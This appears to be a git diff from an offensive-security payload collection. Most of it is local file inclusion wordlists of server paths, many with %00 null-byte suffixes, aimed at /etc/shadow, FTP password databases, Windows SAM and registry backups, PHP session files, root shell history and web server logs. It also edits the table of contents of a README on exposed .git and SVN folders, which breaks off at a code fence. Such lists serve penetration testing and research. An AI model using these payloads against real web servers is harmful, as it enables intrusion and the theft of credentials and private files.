/etc/php4/apache/php.ini%00
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini%00
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini%00
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini%00
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini%00
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini%00
/etc/php/apache/php.ini
/etc/php/apache/php.ini
/etc/php/apache/php.ini
/etc/php/apache/php.ini%00
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini%00
/etc/php.ini
/etc/php.ini
/etc/php.ini
/etc/php.ini%00
/etc/phpmyadmin/config.inc.php
/etc/php/php4/php.ini
/etc/php/php4/php.ini
/etc/php/php4/php.ini
/etc/php/php4/php.ini%00
/etc/php/php.ini
/etc/php/php.ini
/etc/php/php.ini
/etc/php/php.ini%00
/etc/proftp.conf
/etc/proftp.conf
/etc/proftp.conf
/etc/proftp.conf%00
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf%00
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf%00
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf%00
/etc/pureftpd.passwd
/etc/pureftpd.passwd
/etc/pureftpd.passwd
/etc/pureftpd.passwd%00
/etc/pureftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.pdb%00
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb%00
/etc/pure-ftpd/pureftpd.pdb%00
/etc/redhat-release
/etc/release
/etc/security/environ
/etc/security/environ
/etc/security/environ
/etc/security/environ%00
/etc/security/group
/etc/security/group
/etc/security/group
/etc/security/group%00
/etc/security/limits
/etc/security/limits
/etc/security/limits
/etc/security/limits%00
/etc/security/passwd
/etc/security/passwd
/etc/security/passwd
/etc/security/passwd%00
/etc/security/user
/etc/security/user
/etc/security/user
/etc/security/user%00
/etc/shadow
/etc/shadow~
/etc/shadow
/etc/shadow
/etc/shadow%00
/etc/ssh/sshd_config
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf%00
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list%00
/etc/vsftpd.conf
/etc/vsftpd.conf
/etc/vsftpd.conf
/etc/vsftpd.conf%00
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf%00
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess%00
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts%00
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers%00
/home2\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini
/home2\bin\stable\apache\php.ini%00
/home\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini%00
\log\access_log
\log\access.log
@ -311,83 +311,83 @@ etc/passwd%00
\log\httpd\access_log
\log\httpd\error_log
/logs/access_log
/logs/access_log
/logs/access_log
/logs/access.log
/logs/access.log
/logs/access.log
\logs\access_log
\logs\access.log
/logs/access.log%00
/logs/error_log
/logs/error_log
/logs/error_log
/logs/error.log
/logs/error.log
/logs/error.log
\logs\error_log
\logs\error.log
/logs/error.log%00
\logs\httpd\access_log
\logs\httpd\error_log
/logs/pure-ftpd.log
/logs/pure-ftpd.log
/logs/pure-ftpd.log
/logs/pure-ftpd.log%00
\mysql\bin\my.ini
/NetServer\bin\stable\apache\php.ini
/NetServer\bin\stable\apache\php.ini
/NetServer\bin\stable\apache\php.ini
/NetServer\bin\stable\apache\php.ini%00
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf%00
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf%00
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/access.log
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log%00
/opt/lampp/logs/access.log%00
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error.log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log%00
/opt/lampp/logs/error.log%00
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini%00
/opt/xampp/logs/access_log
/opt/xampp/logs/access_log
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/access.log
/opt/xampp/logs/access.log
\opt\xampp\logs\access_log
\opt\xampp\logs\access.log
/opt/xampp/logs/access_log%00
/opt/xampp/logs/access.log%00
/opt/xampp/logs/error_log
/opt/xampp/logs/error_log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error.log
/opt/xampp/logs/error.log
\opt\xampp\logs\error_log
\opt\xampp\logs\error.log
/opt/xampp/logs/error_log%00
/opt/xampp/logs/error.log%00
/php4\php.ini
/php4\php.ini
/php4\php.ini
/php4\php.ini%00
/php5\php.ini
/php5\php.ini
/php5\php.ini
/php5\php.ini%00
php://input
/php\php.ini
/php\php.ini
/php\php.ini
/PHP\php.ini
/PHP\php.ini
/PHP\php.ini
/php\php.ini%00
/PHP\php.ini%00
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf%00
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default%00
/proc/cmdline
/proc/self/cmdline
@ -433,198 +433,198 @@ php://input
/proc/self/status
/proc/version
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache2\conf\httpd.conf%00
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf%00
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\access.log%00
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\Apache Group\Apache\logs\error.log
\Program Files\Apache Group\Apache\logs\error.log
/Program Files\Apache Group\Apache\logs\error.log%00
/Program Files\xampp\apache\conf\httpd.conf
/Program Files\xampp\apache\conf\httpd.conf
/Program Files\xampp\apache\conf\httpd.conf
/Program Files\xampp\apache\conf\httpd.conf%00
\Program Files\xampp\apache\conf\httpd.confetc/passwd
/root/.bash_history
/tmp/sess_<sessid>
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf%00
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf%00
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf%00
/usr/lib/php.ini
/usr/lib/php.ini
/usr/lib/php.ini
/usr/lib/php.ini%00
/usr/lib/php/php.ini
/usr/lib/php/php.ini
/usr/lib/php/php.ini
/usr/lib/php/php.ini%00
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default%00
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf%00
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf%00
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log%00
/usr/local/apache2/logs/access.log%00
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log%00
/usr/local/apache2/logs/error.log%00
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf%00
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini%00
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf%00
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log%00
/usr/local/apache/logs/access_log%00
/usr/local/apache/logs/access. log%00
/usr/local/apache/logs/access.log%00
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf%00
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf%00
/usr/local/cpanel/logs
/usr/local/cpanel/logs
/usr/local/cpanel/logs
/usr/local/cpanel/logs%00
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log%00
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log%00
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log%00
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log%00
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log%00
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf%00
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf%00
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf%00
/usr/local/etc/php.ini
/usr/local/etc/php.ini
/usr/local/etc/php.ini
/usr/local/etc/php.ini%00
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf%00
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb%00
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf%00
/usr/local/lib/php.ini
/usr/local/lib/php.ini
/usr/local/lib/php.ini
/usr/local/lib/php.ini%00
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf%00
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php%00
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini%00
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf%00
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php%00
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini%00
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf%00
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php%00
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini%00
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf%00
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb%00
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl%00
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini%00
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/%00
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/%00
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/%00
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/%00
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl%00
/var/adm/lastlog
/var/adm/log/xferlog
/var/adm/log/xferlog
/var/adm/log/xferlog
/var/adm/log/xferlog%00
/var/adm/messages
/var/adm/messages.0
@ -634,28 +634,28 @@ php://input
/var/adm/utmpx
/var/adm/wtmpx
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config%00
/var/db/shadow/hash
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf%00
/var/lib/php5/session/sess_<sessid>
/var/lib/php/session/sess_<sessid>
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini%00
/var/log/access_log
/var/log/access_log
/var/log/access_log
/var/log/access_log
/var/log/access.log
/var/log/access.log
/var/log/access.log
/var/log/access.log
/var/log/access_log%00
/var/log/access.log%00
/var/log/apache2/access_log
/var/log/apache2/access_log
/var/log/apache2/access_log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/access.log
/var/log/apache2/access_log%00
@ -664,12 +664,12 @@ php://input
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/error.log
/var/log/apache2/error.log
/var/log/apache2/error.log
/var/log/apache2/error_log%00
/var/log/apache2/error.log%00
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/access.log
/var/log/apache/access_log%00
@ -678,7 +678,7 @@ php://input
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error_log%00
/var/log/apache/error.log%00
/var/log/authlog
@ -698,39 +698,39 @@ php://input
/var/log/error_log%00
/var/log/error.log%00
/var/log/exim_mainlog
/var/log/exim_mainlog
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim/mainlog
/var/log/exim/mainlog
/var/log/exim_mainlog%00
/var/log/exim/mainlog%00
/var/log/exim_paniclog
/var/log/exim_paniclog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim/paniclog
/var/log/exim/paniclog
/var/log/exim_paniclog%00
/var/log/exim/paniclog%00
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/exim/rejectlog
/var/log/exim/rejectlog
/var/log/exim/rejectlog%00
/var/log/exim_rejectlog%00/etc/issue
/var/log/exim_rejectlog/etc/passwd
/var/log/ftplog
/var/log/ftplog
/var/log/ftplog
/var/log/ftplog%00
/var/log/ftp-proxy
/var/log/ftp-proxy
/var/log/ftp-proxy
/var/log/ftp-proxy%00
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log%00
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/access_log%00
/var/log/httpd/access.log%00
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpd/error_log%00
/var/log/httpd/error.log%00
@ -738,7 +738,7 @@ php://input
/var/log/lastlog
/var/log/maillog
/var/log/mail.log
/var/log/maillog
/var/log/maillog
/var/log/maillog%00
/var/log/messages
/var/log/messages.0
@ -751,23 +751,23 @@ php://input
/var/log/messages.3.gz
/var/log/messages.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log%00
/var/log/mysql.log
/var/log/mysql.log
/var/log/mysql.log
/var/log/mysql.log%00
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log%00
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log%00
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log%00
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/access.log
/var/log/nginx/access_log%00
@ -776,17 +776,17 @@ php://input
/var/log/nginx/error_log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/var/log/proftpd
/var/log/proftpd
/var/log/proftpd
/var/log/proftpd%00
/var/log/pureftpd.log
/var/log/pureftpd.log
/var/log/pureftpd.log
/var/log/pureftpd.log%00
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log%00
/var/log/secure.log
/var/log/syslog
@ -800,40 +800,40 @@ php://input
/var/log/syslog.3.gz
/var/log/syslog.log
/var/log/vsftpd.log
/var/log/vsftpd.log
/var/log/vsftpd.log
/var/log/vsftpd.log%00
/var/log/wtmp
/var/log/xferlog
/var/log/xferlog
/var/log/xferlog
/var/log/xferlog%00
/var/mail/apache
/var/mail/nobody
/var/mail/www
/var/mail/www-data
/var/mysql.log
/var/mysql.log
/var/mysql.log
/var/mysql.log%00
/var/root/.bash_history
/var/root/.sh_history
/var/run/utmp
/var/www/.bash_history
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf%00
/var/www/config.php
/var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/access.log
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/var/www/logs/error_log
/var/www/logs/error_log
/var/www/logs/error_log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/var/www/mgr/logs/access_log
@ -841,49 +841,49 @@ php://input
/var/www/mgr/logs/error_log
/var/www/mgr/logs/error.log
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
/web/conf/php.ini
/web/conf/php.ini
/web/conf/php.ini
/web/conf/php.ini%00
/WINDOWS\php.ini
/WINDOWS\php.ini
/WINDOWS\php.ini
/WINDOWS\php.ini%00
/WINNT\php.ini
/WINNT\php.ini
/WINNT\php.ini
/WINNT\php.ini%00
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log%00
/xampp\apache\bin\php.ini
/xampp\apache\bin\php.ini
/xampp\apache\bin\php.ini
/xampp\apache\bin\php.ini%00
\xampp\apache\conf\httpd.conf
\xampp\apache\logs\access.log

6
File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt
View File

@ -14,7 +14,7 @@
/apache/logs/error.log%00
/apache/logs/access.log%00
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/access.log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/var/www/logs/access_log%00
@ -76,7 +76,7 @@
/logs/error.log%00
/logs/access.log%00
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/access.log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/usr/local/apache/logs/access_log%00
@ -142,7 +142,7 @@
/logs/error.log%00
/logs/access.log%00
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/access.log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/var/www/logs/access_log%00

8
File Inclusion/Intruders/Windows-files.txt
View File

@ -146,7 +146,7 @@ C:/windows/repair/security
C:/windows/repair/software
C:/windows/repair/system
C:/windows/system32/config/appevent.evt
C:/windows/system32/config/default.save
C:/windows/system32/config/default.sav
C:/windows/system32/config/regback/default
C:/windows/system32/config/regback/sam
C:/windows/system32/config/regback/security
@ -154,11 +154,11 @@ C:/windows/system32/config/regback/software
C:/windows/system32/config/regback/system
C:/windows/system32/config/sam
C:/windows/system32/config/secevent.evt
C:/windows/system32/config/security.save
C:/windows/system32/config/software.save
C:/windows/system32/config/security.sav
C:/windows/system32/config/software.sav
C:/windows/system32/config/system
C:/windows/system32/config/system.sa
C:/windows/system32/config/system.save
C:/windows/system32/config/system.sav
C:/windows/system32/drivers/etc/hosts
C:/windows/system32/eula.txt
C:/windows/system32/inetsrv/config/applicationhost.config

160
Insecure Source Code Management/README.md
View File

@ -1,34 +1,34 @@
# Insecure Source Code Management
* [Git](#git)
+ [Example](#example)
- [Git](#git)
- [Example](#example)
- [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
- [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
+ [Tools](#tools)
- [Tools](#tools)
- [Automatic recovery](#automatic-recovery)
* [git-dumper.py](#git-dumperpy)
* [digit.py](#diggitpy)
* [GoGitDumper](#gogitdumper)
* [rip-git](#rip-git)
* [GitHack](#githack)
* [GitTools](#gittools)
- [git-dumper.py](#git-dumperpy)
- [diggit.py](#diggitpy)
- [GoGitDumper](#gogitdumper)
- [rip-git](#rip-git)
- [GitHack](#githack)
- [GitTools](#gittools)
- [Harvesting secrets](#harvesting-secrets)
* [trufflehog](#trufflehog)
* [Yar](#yar)
* [Gitrob](#gitrob)
* [Gitleaks](#gitleaks)
* [Subversion](#subversion)
+ [Example (Wordpress)](#example-wordpress)
+ [Tools](#tools-1)
- [trufflehog](#trufflehog)
- [Yar](#yar)
- [Gitrob](#gitrob)
- [Gitleaks](#gitleaks)
- [Subversion](#subversion)
- [Example (Wordpress)](#example-wordpress)
- [Tools](#tools-1)
- [svn-extractor](#svn-extractor)
* [Bazaar](#bazaar)
+ [Tools](#tools-2)
- [Bazaar](#bazaar)
- [Tools](#tools-2)
- [rip-bzr.pl](#rip-bzrpl)
- [bzr_dumper](#bzr_dumper)
* [Mercurial](#mercurial)
+ [Tools](#tools-3)
- [Mercurial](#mercurial)
- [Tools](#tools-3)
- [rip-hg.pl](#rip-hgpl)
* [References](#references)
- [References](#references)
## Git
@ -46,53 +46,57 @@ Check for the following files, if they exist you can extract the .git folder.
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
```powershell
